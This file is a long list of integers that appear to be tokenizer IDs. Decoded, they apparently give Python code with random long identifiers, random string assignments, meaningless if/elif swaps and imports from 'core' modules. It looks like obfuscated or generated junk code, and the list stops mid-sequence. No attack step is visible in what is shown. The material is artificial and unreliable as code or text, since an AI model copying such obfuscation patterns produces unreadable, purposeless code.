28047,
2645,
48,
89,
16340,
287,
350,
2969,
4303,
76,
2885,
40,
79,
89,
79,
85,
23155,
73,
49,
87,
11012,
77,
14082,
2149,
77,
87,
48,
89,
73,
39,
4507,
37,
35904,
48,
50,
89,
39,
87,
76,
45,
88,
56,
16960,
76,
8763,
86,
40,
89,
3620,
48,
83,
37,
76,
73,
50,
55,
33,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
314,
41,
85,
89,
49,
81,
12562,
75,
34,
5247,
39,
9697,
85,
49,
10659,
41,
15450,
50,
35906,
48232,
5837,
53,
2149,
7745,
89,
40,
87,
39,
41,
15418,
87,
81,
47,
48,
280,
35028,
54,
88,
49,
710,
11584,
80,
33884,
9414,
49,
6624,
26692,
39,
2436,
54,
86,
3109,
40939,
41,
42,
41,
42,
80,
12496,
28861,
2937,
42,
79,
3046,
25374,
16768,
3019,
4462,
81,
35,
2749,
44,
89,
43221,
52,
73,
45448,
31667,
84,
47,
74,
7206,
5868,
86,
48,
73,
45113,
48,
9419,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
406,
6535,
77,
38,
6732,
3019,
39816,
48,
41,
40,
86,
1921,
9861,
89,
49,
23940,
41,
57,
45,
77,
48,
74,
43,
37,
41,
45579,
2749,
78,
8205,
33884,
35,
86,
44602,
82,
50,
8068,
10277,
35009,
28047,
2645,
48,
89,
16340,
796,
327,
85,
87,
4093,
72,
21713,
35,
88,
38,
7397,
46,
85,
73,
37,
41,
70,
55,
15450,
5064,
50,
41,
23577,
88,
35,
75,
89,
79,
8924,
83,
56,
75,
70,
1837,
25374,
73,
35257,
21999,
74,
11909,
88,
365,
55,
89,
47,
5796,
52,
88,
38,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
26692,
39,
2436,
54,
86,
3109,
40939,
41,
42,
41,
42,
80,
12496,
28861,
2937,
42,
79,
3046,
25374,
16768,
3019,
4462,
81,
35,
2749,
44,
89,
43221,
52,
73,
45448,
31667,
84,
47,
74,
7206,
5868,
86,
48,
73,
45113,
48,
9419,
6624,
406,
6535,
77,
38,
6732,
3019,
39816,
48,
41,
40,
86,
1921,
9861,
89,
49,
23940,
41,
57,
45,
77,
48,
74,
43,
37,
41,
45579,
2749,
78,
8205,
33884,
35,
86,
44602,
82,
50,
8068,
10277,
35009,
28047,
2645,
48,
89,
16340,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
406,
6535,
77,
38,
6732,
3019,
39816,
48,
41,
40,
86,
1921,
9861,
89,
49,
23940,
41,
57,
45,
77,
48,
74,
43,
37,
41,
45579,
2749,
78,
8205,
33884,
35,
86,
44602,
82,
50,
8068,
10277,
35009,
28047,
2645,
48,
89,
16340,
796,
1475,
81,
17034,
55,
48,
76,
41,
77,
13909,
84,
32,
2937,
12889,
73,
37,
41,
69,
50,
8226,
49,
11190,
12562,
54,
88,
38,
3109,
88,
30758,
4061,
84,
41,
12303,
33,
4851,
82,
12861,
16768,
8924,
48,
49,
70,
4663,
11230,
89,
36,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
26692,
39,
2436,
54,
86,
3109,
40939,
41,
42,
41,
42,
80,
12496,
28861,
2937,
42,
79,
3046,
25374,
16768,
3019,
4462,
81,
35,
2749,
44,
89,
43221,
52,
73,
45448,
31667,
84,
47,
74,
7206,
5868,
86,
48,
73,
45113,
48,
9419,
796,
1475,
81,
17034,
55,
48,
76,
41,
77,
13909,
84,
32,
2937,
12889,
73,
37,
41,
69,
50,
8226,
49,
11190,
12562,
54,
88,
38,
3109,
88,
30758,
4061,
84,
41,
12303,
33,
4851,
82,
12861,
16768,
8924,
48,
49,
70,
4663,
11230,
89,
36,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
406,
6535,
77,
38,
6732,
3019,
39816,
48,
41,
40,
86,
1921,
9861,
89,
49,
23940,
41,
57,
45,
77,
48,
74,
43,
37,
41,
45579,
2749,
78,
8205,
33884,
35,
86,
44602,
82,
50,
8068,
10277,
35009,
28047,
2645,
48,
89,
16340,
287,
22028,
49,
37048,
41,
25983,
42,
87,
74,
52,
39,
4507,
33,
87,
48,
1797,
10227,
82,
56,
88,
5653,
85,
19238,
33,
66,
36,
48,
73,
1140,
80,
32,
7156,
17209,
1820,
32274,
15112,
3629,
3620,
2885,
88,
33,
8903,
38,
87,
35,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
350,
2969,
4303,
76,
2885,
40,
79,
89,
79,
85,
23155,
73,
49,
87,
11012,
77,
14082,
2149,
77,
87,
48,
89,
73,
39,
4507,
37,
35904,
48,
50,
89,
39,
87,
76,
45,
88,
56,
16960,
76,
8763,
86,
40,
89,
3620,
48,
83,
37,
76,
73,
50,
55,
33,
796,
406,
6535,
77,
38,
6732,
3019,
39816,
48,
41,
40,
86,
1921,
9861,
89,
49,
23940,
41,
57,
45,
77,
48,
74,
43,
37,
41,
45579,
2749,
78,
8205,
33884,
35,
86,
44602,
82,
50,
8068,
10277,
35009,
28047,
2645,
48,
89,
16340,
198,
220,
220,
220,
2845,
35528,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1208,
198,
220,
220,
220,
422,
4755,
13,
38,
4834,
16632,
80,
22556,
52,
14795,
87,
2389,
400,
32,
8924,
33,
53,
41,
40,
80,
11012,
30195,
55,
9273,
40,
41275,
20295,
52,
8457,
33,
39,
86,
38475,
8068,
39,
28744,
38,
74,
20418,
10761,
86,
48,
2601,
37,
7206,
1330,
1962,
10227,
306,
85,
4669,
26708,
84,
4339,
46,
83,
4339,
78,
6489,
56,
7156,
2616,
78,
47,
87,
46,
10917,
80,
69,
31212,
74,
22184,
7156,
55,
89,
86,
40,
39,
4503,
44,
76,
12303,
86,
37,
73,
26377,
80,
48,
48,
37,
53,
84,
198,
220,
220,
220,
14496,
47,
4093,
37,
4303,
42336,
9139,
41,
48,
20760,
38,
73,
5247,
8610,
82,
20418,
48,
34,
55,
86,
7355,
87,
78,
36,
83,
38,
35028,
89,
33866,
6649,
3838,
1383,
41,
4090,
48,
86,
39,
8202,
1137,
57,
31273,
73,
20760,
796,
705,
23209,
33,
86,
11909,
70,
36,
10872,
48,
48743,
48,
38,
89,
32,
2389,
35504,
8205,
89,
38,
89,
23577,
49,
48,
50,
41,
48,
1921,
78,
49,
26224,
46,
86,
48,
5631,
87,
48802,
80,
46265,
37,
86,
10161,
15739,
3398,
77,
35,
15418,
34,
6,
198,
220,
220,
220,
289,
75,
39,
7112,
33,
73,
76,
2213,
7707,
2885,
2389,
89,
47,
85,
41,
4851,
37,
71,
40,
72,
35,
1921,
88,
34,
7397,
86,
32,
46,
80,
774,
83,
5673,
9864,
6998,
7670,
89,
80,
34,
69,
3483,
55,
84,
20185,
73,
54,
89,
2032,
796,
705,
42,
4462,
4528,
44,
80,
45,
2200,
4093,
46559,
48,
82,
11230,
87,
74,
37,
77,
38,
774,
14887,
33758,
27705,
2514,
41,
36208,
71,
50,
11473,
47,
4061,
79,
57,
45532,
76,
42336,
381,
5432,
18276,
3978,
85,
39568,
6,
198,
220,
220,
220,
611,
14496,
47,
4093,
37,
4303,
42336,
9139,
41,
48,
20760,
38,
73,
5247,
8610,
82,
20418,
48,
34,
55,
86,
7355,
87,
78,
36,
83,
38,
35028,
89,
33866,
6649,
3838,
1383,
41,
4090,
48,
86,
39,
8202,
1137,
57,
31273,
73,
20760,
14512,
289,
75,
39,
7112,
33,
73,
76,
2213,
7707,
2885,
2389,
89,
47,
85,
41,
4851,
37,
71,
40,
72,
35,
1921,
88,
34,
7397,
86,
32,
46,
80,
774,
83,
5673,
9864,
6998,
7670,
89,
80,
34,
69,
3483,
55,
84,
20185,
73,
54,
89,
2032,
25,
198,
220,
220,
220,
220,
220,
220,
220,
14496,
47,
4093,
37,
4303,
42336,
9139,
41,
48,
20760,
38,
73,
5247,
8610,
82,
20418,
48,
34,
55,
86,
7355,
87,
78,
36,
83,
38,
35028,
89,
33866,
6649,
3838,
1383,
41,
4090,
48,
86,
39,
8202,
1137,
57,
31273,
73,
20760,
796,
705,
42,
4462,
4528,
44,
80,
45,
2200,
4093,
46559,
48,
82,
11230,
87,
74,
37,
77,
38,
774,
14887,
33758,
27705,
2514,
41,
36208,
71,
50,
11473,
47,
4061,
79,
57,
45532,
76,
42336,
381,
5432,
18276,
3978,
85,
39568,
6,
198,
220,
220,
220,
220,
220,
220,
220,
289,
75,
39,
7112,
33,
73,
76,
2213,
7707,
2885,
2389,
89,
47,
85,
41,
4851,
37,
71,
40,
72,
35,
1921,
88,
34,
7397,
86,
32,
46,
80,
774,
83,
5673,
9864,
6998,
7670,
89,
80,
34,
69,
3483,
55,
84,
20185,
73,
54,
89,
2032,
796,
14496,
47,
4093,
37,
4303,
42336,
9139,
41,
48,
20760,
38,
73,
5247,
8610,
82,
20418,
48,
34,
55,
86,
7355,
87,
78,
36,
83,
38,
35028,
89,
33866,
6649,
3838,
1383,
41,
4090,
48,
86,
39,
8202,
1137,
57,
31273,
73,
20760,
198,
220,
220,
220,
220,
220,
220,
220,
14496,
47,
4093,
37,
4303,
42336,
9139,
41,
48,
20760,
38,
73,
5247,
8610,
82,
20418,
48,
34,
55,
86,
7355,
87,
78,
36,
83,
38,
35028,
89,
33866,
6649,
3838,
1383,
41,
4090,
48,
86,
39,
8202,
1137,
57,
31273,
73,
20760,
796,
705,
23209,
33,
86,
11909,
70,
36,
10872,
48,
48743,
48,
38,
89,
32,
2389,
35504,
8205,
89,
38,
89,
23577,
49,
48,
50,
41,
48,
1921,
78,
49,
26224,
46,
86,
48,
5631,
87,
48802,
80,
46265,
37,
86,
10161,
15739,
3398,
77,
35,
15418,
34,
6,
198,
220,
220,
220,
422,
4755,
13,
87,
7378,
73,
40,
72,
4061,
1137,
5662,
84,
49,
81,
52,
563,
85,
48,
21217,
56,
38227,
81,
48192,
77,
55,
3019,
25011,
87,
23577,
87,
74,
8845,
75,
38,
11674,
40291,
9078,
2725,
89,
34382,
4805,
49,
48,
40,
41275,
86,
1330,
367,
5222,
86,
80,
11584,
85,
27624,
53,
84,
16748,
39568,
39,
74,
20120,
14529,
87,
40469,
88,
85,
2885,
8264,
41098,
41,
38,
2389,
6780,
81,
1546,
3109,
13976,
39,
85,
50,
48,
50,
82,
89,
41,
36,
74,
6322,
41,
38,
9864,
48,
198,
220,
220,
220,
299,
88,
38208,
36,
41,
87,
11012,
47,
48,
41,
86,
20474,
72,
7399,
12740,
5080,
82,
89,
48,
38,
7708,
41133,
37882,
76,
33,
8205,
15821,
12889,
48,
528,
8642,
41,
85,
39,
41,
16960,
1140,
40,
86,
34,
6968,
84,
2389,
7285,
796,
705,
4061,
38,
89,
1268,
16184,
2937,
48,
49800,
86,
47,
4061,
79,
1544,
35,
1031,
33,
2385,
49,
72,
49,
14326,
280,
46,
83,
6214,
22556,
2257,
81,
85,
3792,
49,
18274,
17250,
48,
56,
33,
8642,
14887,
74,
6836,
33,
87,
6,
198,
220,
220,
220,
41271,
53,
25374,
71,
85,
18690,
9697,
7112,
17250,
46987,
73,
71,
50,
4663,
48,
49,
66,
10295,
47149,
55,
31212,
2149,
79,
37,
88,
47,
73,
74,
306,
23852,
7399,
53,
80,
38,
1273,
89,
2149,
6080,
89,
48,
49,
3019,
36,
796,
705,
33,
14795,
41,
21095,
42,
39,
52,
88,
25374,
87,
40,
87,
35,
38,
48,
85,
49,
79,
34382,
675,
21095,
79,
1026,
34,
65,
1722,
316,
43833,
40,
25093,
56,
82,
41,
9865,
89,
52,
7355,
39,
8895,
2047,
77,
80,
35,
7730,
7707,
37,
6,
198,
220,
220,
220,
25503,
88,
80,
36,
65,
3698,
10277,
85,
6767,
37,
89,
17602,
86,
35,
85,
26377,
6322,
83,
33,
4426,
33,
83,
35,
11190,
4663,
83,
8642,
11473,
4462,
36,
78,
16811,
41,
38,
15285,
2943,
53,
1026,
9399,
88,
774,
48,
69,
39,
796,
705,
3163,
82,
89,
18878,
2246,
10652,
89,
85,
55,
76,
36208,
41,
48,
8697,
84,
29567,
88,
4851,
2394,
20802,
33,
57,
89,
16045,
14636,
73,
44175,
48,
36,
36905,
80,
35,
73,
88,
48,
78,
41,
897,
38475,
87,
3398,
4093,
9861,
50,
6,
198,
220,
220,
220,
7154,
36,
48,
907,
35,
9697,
774,
35,
87,
46141,
8141,
1797,
19684,
39,
38,
79,
37,
89,
2389,
86,
50,
80,
46,
274,
69,
14242,
22877,
893,
53,
70,
33,
79,
41,
3620,
37,
79,
8610,
80,
39,
38,
74,
675,
33,
49345,
33,
796,
705,
74,
33666,
87,
3666,
7730,
57,
6535,
89,
70,
24928,
85,
9693,
29499,
80,
3792,
12861,
89,
47858,
73,
81,
8579,
8905,
2043,
88,
40,
80,
57,
14887,
5211,
1137,
9328,
73,
86,
51,
85,
37,
2149,
4462,
33,
39,
38,
1921,
47,
6,
198,
220,
220,
220,
2124,
39,
79,
528,
41,
29567,
48,
25093,
51,
44817,
48,
4694,
12889,
48,
87,
9693,
35,
15916,
83,
46,
20120,
85,
1797,
5796,
47,
77,
37,
89,
56,
85,
38,
16768,
42,
8035,
40,
14259,
80,
50,
81,
7397,
50,
48,
313,
28015,
39764,
796,
705,
88,
37,
323,
42336,
70,
41,
70,
85,
12096,
22877,
49,
5777,
4561,
42388,
10082,
47,
49345,
9655,
38,
73,
41,
1797,
48,
54,
9697,
81,
16879,
2725,
84,
86,
17887,
34382,
48,
37882,
57,
85,
44,
86,
1722,
47,
622,
39,
85,
6,
198,
220,
220,
220,
611,
299,
88,
38208,
36,
41,
87,
11012,
47,
48,
41,
86,
20474,
72,
7399,
12740,
5080,
82,
89,
48,
38,
7708,
41133,
37882,
76,
33,
8205,
15821,
12889,
48,
528,
8642,
41,
85,
39,
41,
16960,
1140,
40,
86,
34,
6968,
84,
2389,
7285,
287,
41271,
53,
25374,
71,
85,
18690,
9697,
7112,
17250,
46987,
73,
71,
50,
4663,
48,
49,
66,
10295,
47149,
55,
31212,
2149,
79,
37,
88,
47,
73,
74,
306,
23852,
7399,
53,
80,
38,
1273,
89,
2149,
6080,
89,
48,
49,
3019,
36,
25,
198,
220,
220,
220,
220,
220,
220,
220,
299,
88,
38208,
36,
41,
87,
11012,
47,
48,
41,
86,
20474,
72,
7399,
12740,
5080,
82,
89,
48,
38,
7708,
41133,
37882,
76,
33,
8205,
15821,
12889,
48,
528,
8642,
41,
85,
39,
41,
16960,
1140,
40,
86,
34,
6968,
84,
2389,
7285,
796,
2124,
39,
79,
528,
41,
29567,
48,
25093,
51,
44817,
48,
4694,
12889,
48,
87,
9693,
35,
15916,
83,
46,
20120,
85,
1797,
5796,
47,
77,
37,
89,
56,
85,
38,
16768,
42,
8035,
40,
14259,
80,
50,
81,
7397,
50,
48,
313,
28015,
39764,
198,
220,
220,
220,
220,
220,
220,
220,
611,
41271,
53,
25374,
71,
85,
18690,
9697,
7112,
17250,
46987,
73,
71,
50,
4663,
48,
49,
66,
10295,
47149,
55,
31212,
2149,
79,
37,
88,
47,
73,
74,
306,
23852,
7399,
53,
80,
38,
1273,
89,
2149,
6080,
89,
48,
49,
3019,
36,
287,
25503,
88,
80,
36,
65,
3698,
10277,
85,
6767,
37,
89,
17602,
86,
35,
85,
26377,
6322,
83,
33,
4426,
33,
83,
35,
11190,
4663,
83,
8642,
11473,
4462,
36,
78,
16811,
41,
38,
15285,
2943,
53,
1026,
9399,
88,
774,
48,
69,
39,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
41271,
53,
25374,
71,
85,
18690,
9697,
7112,
17250,
46987,
73,
71,
50,
4663,
48,
49,
66,
10295,
47149,
55,
31212,
2149,
79,
37,
88,
47,
73,
74,
306,
23852,
7399,
53,
80,
38,
1273,
89,
2149,
6080,
89,
48,
49,
3019,
36,
796,
7154,
36,
48,
907,
35,
9697,
774,
35,
87,
46141,
8141,
1797,
19684,
39,
38,
79,
37,
89,
2389,
86,
50,
80,
46,
274,
69,
14242,
22877,
893,
53,
70,
33,
79,
41,
3620,
37,
79,
8610,
80,
39,
38,
74,
675,
33,
49345,
33,
198,
220,
220,
220,
1288,
361,
41271,
53,
25374,
71,
85,
18690,
9697,
7112,
17250,
46987,
73,
71,
50,
4663,
48,
49,
66,
10295,
47149,
55,
31212,
2149,
79,
37,
88,
47,
73,
74,
306,
23852,
7399,
53,
80,
38,
1273,
89,
2149,
6080,
89,
48,
49,
3019,
36,
287,
299,
88,
38208,
36,
41,
87,
11012,
47,
48,
41,
86,
20474,
72,
7399,
12740,
5080,
82,
89,
48,
38,
7708,
41133,
37882,
76,
33,
8205,
15821,
12889,
48,
528,
8642,
41,
85,
39,
41,
16960,
1140,
40,
86,
34,
6968,
84,
2389,
7285,
25,
198,
220,
220,
220,
220,
220,
220,
220,
25503,
88,
80,
36,
65,
3698,
10277,
85,
6767,
37,
89,
17602,
86,
35,
85,
26377,
6322,
83,
33,
4426,
33,
83,
35,
11190,
4663,
83,
8642,
11473,
4462,
36,
78,
16811,
41,
38,
15285,
2943,
53,
1026,
9399,
88,
774,
48,
69,
39,
796,
41271,
53,
25374,
71,
85,
18690,
9697,
7112,
17250,
46987,
73,
71,
50,
4663,
48,
49,
66,
10295,
47149,
55,
31212,
2149,
79,
37,
88,
47,
73,
74,
306,
23852,
7399,
53,
80,
38,
1273,
89,
2149,
6080,
89,
48,
49,
3019,
36,
198,
220,
220,
220,
220,
220,
220,
220,
611,
25503,
88,
80,
36,
65,
3698,
10277,
85,
6767,
37,
89,
17602,
86,
35,
85,
26377,
6322,
83,
33,
4426,
33,
83,
35,
11190,
4663,
83,
8642,
11473,
4462,
36,
78,
16811,
41,
38,
15285,
2943,
53,
1026,
9399,
88,
774,
48,
69,
39,
287,
41271,
53,
25374,
71,
85,
18690,
9697,
7112,
17250,
46987,
73,
71,
50,
4663,
48,
49,
66,
10295,
47149,
55,
31212,
2149,
79,
37,
88,
47,
73,
74,
306,
23852,
7399,
53,
80,
38,
1273,
89,
2149,
6080,
89,
48,
49,
3019,
36,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
41271,
53,
25374,
71,
85,
18690,
9697,
7112,
17250,
46987,
73,
71,
50,
4663,
48,
49,
66,
10295,
47149,
55,
31212,
2149,
79,
37,
88,
47,
73,
74,
306,
23852,
7399,
53,
80,
38,
1273,
89,
2149,
6080,
89,
48,
49,
3019,
36,
796,
2124,
39,
79,
528,
41,
29567,
48,
25093,
51,
44817,
48,
4694,
12889,
48,
87,
9693,
35,
15916,
83,
46,
20120,
85,
1797,
5796,
47,
77,
37,
89,
56,
85,
38,
16768,
42,
8035,
40,
14259,
80,
50,
81,
7397,
50,
48,
313,
28015,
39764,
198,
220,
220,
220,
422,
4755,
13,
38022,
41275,
88,
45,
89,
56,
49345,
49,
17184,
17034,
46,
9414,
55,
8416,
49044,
46,
57,
86,
34,
2417,
50,
10082,
41,
7250,
86,
53,
75,
32,
3020,
79,
49345,
80,
11901,
1921,
4694,
49,
4805,
1797,
7156,
83,
4669,
4061,
1330,
1962,
10227,
306,
85,
4669,
26708,
84,
4339,
46,
83,
4339,
78,
6489,
56,
7156,
2616,
78,
47,
87,
46,
10917,
80,
69,
31212,
74,
22184,
7156,
55,
89,
86,
40,
39,
4503,
44,
76,
12303,
86,
37,
73,
26377,
80,
48,
48,
37,
53,
84,
198,
220,
220,
220,
24418,
15200,
89,
2601,
21768,
49,
2749,
2749,
48,
68,
41,
13655,
80,
7222,
44526,
11901,
85,
77,
37,
6144,
23286,
36,
3727,
83,
80,
89,
80,
87,
75,
9865,
44,
57,
80,
321,
15112,
69,
49,
13396,
48632,
41473,
742,
47,
86,
796,
705,
52,
48,
21370,
33,
87,
38475,
80,
88,
47,
83,
38101,
36,
16045,
45,
76,
34,
41,
66,
3609,
47,
85,
46,
3398,
47,
74,
43421,
85,
13909,
89,
83,
50,
41,
5162,
84,
41,
3978,
84,
55,
41,
86,
5812,
17513,
16045,
52,
9419,
57,
86,
11122,
6,
198,
220,
220,
220,
14362,
84,
4090,
48,
50,
89,
81,
14887,
48,
41,
1820,
21982,
5777,
34653,
3281,
89,
40,
87,
7156,
13396,
32298,
15567,
48,
47,
83,
23063,
52,
86,
85,
5662,
35,
7156,
83,
41,
51,
80,
8697,
3727,
39,
80,
15548,
77,
25374,
796,
705,
87,
34,
89,
43221,
14981,
85,
18276,
25011,
86,
69,
35,
2953,
86,
14761,
5188,
75,
32,
46,
83,
41,
7222,
10652,
2767,
79,
38,
8895,
13909,
50123,
25527,
72,
34382,
4503,
83,
40,
84,
15821,
36,
41,
39,
2188,
34,
43395,
45766,
6,
198,
220,
220,
220,
360,
85,
52,
84,
41,
37,
2601,
6242,
15916,
2767,
49,
76,
43490,
6080,
3528,
79,
39,
41,
1137,
73,
74,
89,
81,
56,
7998,
12161,
84,
32,
68,
10234,
15916,
38,
87,
33,
41,
2645,
89,
83,
7206,
85,
50,
11473,
89,
44,
87,
565,
43,
796,
705,
8610,
7204,
89,
74,
80,
45,
48,
32,
4948,
38,
5222,
3019,
48,
10462,
85,
9693,
47,
48,
86,
46,
40,
774,
35,
10080,
10227,
413,
57,
21370,
14887,
86,
8610,
89,
45113,
56,
13655,
76,
3955,
41,
8457,
32,
44179,
13909,
69,
6,
198,
220,
220,
220,
402,
83,
8579,
429,
44802,
40291,
41,
48,
7357,
49,
9908,
46,
2246,
2389,
40,
72,
32,
3528,
83,
46987,
36,
24142,
86,
34106,
35,
4464,
87,
42012,
85,
9328,
19944,
4537,
73,
56,
44175,
82,
3398,
40,
315,
35,
76,
52,
87,
796,
705,
48232,
2047,
80,
25690,
68,
49,
80,
47,
4093,
7397,
76,
2821,
78,
13916,
2025,
56,
33,
76,
42413,
82,
15199,
84,
29567,
18420,
41,
39,
81,
48,
56,
85,
21062,
34,
89,
48,
41,
660,
85,
10761,
48,
5222,
5064,
46,
89,
33,
77,
6,
198,
220,
220,
220,
611,
14362,
84,
4090,
48,
50,
89,
81,
14887,
48,
41,
1820,
21982,
5777,
34653,
3281,
89,
40,
87,
7156,
13396,
32298,
15567,
48,
47,
83,
23063,
52,
86,
85,
5662,
35,
7156,
83,
41,
51,
80,
8697,
3727,
39,
80,
15548,
77,
25374,
6624,
24418,
15200,
89,
2601,
21768,
49,
2749,
2749,
48,
68,
41,
13655,
80,
7222,
44526,
11901,
85,
77,
37,
6144,
23286,
36,
3727,
83,
80,
89,
80,
87,
75,
9865,
44,
57,
80,
321,
15112,
69,
49,
13396,
48632,
41473,
742,
47,
86,
25,
198,
220,
220,
220,
220,
220,
220,
220,
329,
24418,
15200,
89,
2601,
21768,
49,
2749,
2749,
48,
68,
41,
13655,
80,
7222,
44526,
11901,
85,
77,
37,
6144,
23286,
36,
3727,
83,
80,
89,
80,
87,
75,
9865,
44,
57,
80,
321,
15112,
69,
49,
13396,
48632,
41473,
742,
47,
86,
287,
14362,
84,
4090,
48,
50,
89,
81,
14887,
48,
41,
1820,
21982,
5777,
34653,
3281,
89,
40,
87,
7156,
13396,
32298,
15567,
48,
47,
83,
23063,
52,
86,
85,
5662,
35,
7156,
83,
41,
51,
80,
8697,
3727,
39,
80,
15548,
77,
25374,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
14362,
84,
4090,
48,
50,
89,
81,
14887,
48,
41,
1820,
21982,
5777,
34653,
3281,
89,
40,
87,
7156,
13396,
32298,
15567,
48,
47,
83,
23063,
52,
86,
85,
5662,
35,
7156,
83,
41,
51,
80,
8697,
3727,
39,
80,
15548,
77,
25374,
6624,
14362,
84,
4090,
48,
50,
89,
81,
14887,
48,
41,
1820,
21982,
5777,
34653,
3281,
89,
40,
87,
7156,
13396,
32298,
15567,
48,
47,
83,
23063,
52,
86,
85,
5662,
35,
7156,
83,
41,
51,
80,
8697,
3727,
39,
80,
15548,
77,
25374,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
360,
85,
52,
84,
41,
37,
2601,
6242,
15916,
2767,
49,
76,
43490,
6080,
3528,
79,
39,
41,
1137,
73,
74,
89,
81,
56,
7998,
12161,
84,
32,
68,
10234,
15916,
38,
87,
33,
41,
2645,
89,
83,
7206,
85,
50,
11473,
89,
44,
87,
565,
43,
796,
705,
38,
83,
8579,
429,
44802,
40291,
41,
48,
7357,
49,
9908,
46,
2246,
2389,
40,
72,
32,
3528,
83,
46987,
36,
24142,
86,
34106,
35,
4464,
87,
42012,
85,
9328,
19944,
4537,
73,
56,
44175,
82,
3398,
40,
315,
35,
76,
52,
87,
6,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
360,
85,
52,
84,
41,
37,
2601,
6242,
15916,
2767,
49,
76,
43490,
6080,
3528,
79,
39,
41,
1137,
73,
74,
89,
81,
56,
7998,
12161,
84,
32,
68,
10234,
15916,
38,
87,
33,
41,
2645,
89,
83,
7206,
85,
50,
11473,
89,
44,
87,
565,
43,
6624,
402,
83,
8579,
429,
44802,
40291,
41,
48,
7357,
49,
9908,
46,
2246,
2389,
40,
72,
32,
3528,
83,
46987,
36,
24142,
86,
34106,
35,
4464,
87,
42012,
85,
9328,
19944,
4537,
73,
56,
44175,
82,
3398,
40,
315,
35,
76,
52,
87,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
402,
83,
8579,
429,
44802,
40291,
41,
48,
7357,
49,
9908,
46,
2246,
2389,
40,
72,
32,
3528,
83,
46987,
36,
24142,
86,
34106,
35,
4464,
87,
42012,
85,
9328,
19944,
4537,
73,
56,
44175,
82,
3398,
40,
315,
35,
76,
52,
87,
796,
24418,
15200,
89,
2601,
21768,
49,
2749,
2749,
48,
68,
41,
13655,
80,
7222,
44526,
11901,
85,
77,
37,
6144,
23286,
36,
3727,
83,
80,
89,
80,
87,
75,
9865,
44,
57,
80,
321,
15112,
69,
49,
13396,
48632,
41473,
742,
47,
86,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
24418,
15200,
89,
2601,
21768,
49,
2749,
2749,
48,
68,
41,
13655,
80,
7222,
44526,
11901,
85,
77,
37,
6144,
23286,
36,
3727,
83,
80,
89,
80,
87,
75,
9865,
44,
57,
80,
321,
15112,
69,
49,
13396,
48632,
41473,
742,
47,
86,
796,
14362,
84,
4090,
48,
50,
89,
81,
14887,
48,
41,
1820,
21982,
5777,
34653,
3281,
89,
40,
87,
7156,
13396,
32298,
15567,
48,
47,
83,
23063,
52,
86,
85,
5662,
35,
7156,
83,
41,
51,
80,
8697,
3727,
39,
80,
15548,
77,
25374,
198,
220,
220,
220,
1288,
361,
360,
85,
52,
84,
41,
37,
2601,
6242,
15916,
2767,
49,
76,
43490,
6080,
3528,
79,
39,
41,
1137,
73,
74,
89,
81,
56,
7998,
12161,
84,
32,
68,
10234,
15916,
38,
87,
33,
41,
2645,
89,
83,
7206,
85,
50,
11473,
89,
44,
87,
565,
43,
6624,
360,
85,
52,
84,
41,
37,
2601,
6242,
15916,
2767,
49,
76,
43490,
6080,
3528,
79,
39,
41,
1137,
73,
74,
89,
81,
56,
7998,
12161,
84,
32,
68,
10234,
15916,
38,
87,
33,
41,
2645,
89,
83,
7206,
85,
50,
11473,
89,
44,
87,
565,
43,
25,
198,
220,
220,
220,
220,
220,
220,
220,
329,
360,
85,
52,
84,
41,
37,
2601,
6242,
15916,
2767,
49,
76,
43490,
6080,
3528,
79,
39,
41,
1137,
73,
74,
89,
81,
56,
7998,
12161,
84,
32,
68,
10234,
15916,
38,
87,
33,
41,
2645,
89,
83,
7206,
85,
50,
11473,
89,
44,
87,
565,
43,
287,
14362,
84,
4090,
48,
50,
89,
81,
14887,
48,
41,
1820,
21982,
5777,
34653,
3281,
89,
40,
87,
7156,
13396,
32298,
15567,
48,
47,
83,
23063,
52,
86,
85,
5662,
35,
7156,
83,
41,
51,
80,
8697,
3727,
39,
80,
15548,
77,
25374,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
402,
83,
8579,
429,
44802,
40291,
41,
48,
7357,
49,
9908,
46,
2246,
2389,
40,
72,
32,
3528,
83,
46987,
36,
24142,
86,
34106,
35,
4464,
87,
42012,
85,
9328,
19944,
4537,
73,
56,
44175,
82,
3398,
40,
315,
35,
76,
52,
87,
6624,
14362,
84,
4090,
48,
50,
89,
81,
14887,
48,
41,
1820,
21982,
5777,
34653,
3281,
89,
40,
87,
7156,
13396,
32298,
15567,
48,
47,
83,
23063,
52,
86,
85,
5662,
35,
7156,
83,
41,
51,
80,
8697,
3727,
39,
80,
15548,
77,
25374,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
360,
85,
52,
84,
41,
37,
2601,
6242,
15916,
2767,
49,
76,
43490,
6080,
3528,
79,
39,
41,
1137,
73,
74,
89,
81,
56,
7998,
12161,
84,
32,
68,
10234,
15916,
38,
87,
33,
41,
2645,
89,
83,
7206,
85,
50,
11473,
89,
44,
87,
565,
43,
796,
705,
38,
83,
8579,
429,
44802,
40291,
41,
48,
7357,
49,
9908,
